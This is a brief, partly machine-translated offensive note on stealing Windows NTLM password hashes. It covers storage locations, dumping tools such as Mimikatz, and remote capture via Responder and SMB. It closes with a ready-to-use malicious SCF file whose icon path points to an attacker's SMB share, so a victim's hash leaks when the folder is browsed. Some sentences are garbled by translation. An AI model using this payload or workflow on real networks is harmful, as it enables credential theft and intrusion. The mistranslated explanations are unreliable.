获取 NTLM

1 相关背景

1.1 NTLM 的存储位置:

1. System Database SAM (Security Account Manager)

2. DIT database

3. Memory Cache

1.2 NTLM 的获取方式

1. Obtain from SAM

2. Memory acquisition

3. DIT database acquisition

4. WCE, PWDUMP, MIMIKATZ…

1.3 NTLM 的形式

aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

LMHash (LMHash will not be saved by default in the windows 2008 R2 system)

NTHash

NetHash - Mainly obtain this type of hash

1.4 远程获取方式(窃取):

1. Responder

2. HTTP + SMB

3.SCF + SMB4. SQL + SMB

ADV 170014 NTLM SSO

In October 2017, Microsoft released a security bulletin (ADV170014) on Tuesday's patch day, which mentioned a vulnerability in the NTLM authentication scheme that malicious attackers can use to steal hashes.

The attacker simply needs to place a malicious SCF file in a publicly accessible Windows folder.

Once the file is placed in a folder, it will be executed by a mysterious bug. It collects the target's NTLM password hash and sends it to a configuration server.

The target host has a shared folder without password protection, which is very common. For example, in offices, schools, hospitals, and in most Windows environments, people share music, photos, and documents through shared folders.

攻击场景

Non-authentic systems may not have this setting:

Microsoft introduced SCF files in Windows 3.11. SCF files are actually plain text files that can be used to guide Windows File Explorer to perform some basic tasks.

1

2

3

4

5

[Shell]

Command=2

IconFile=\\192.168.1.2\sharetest.ico

[Taskbar]

Command=ToggleDesktop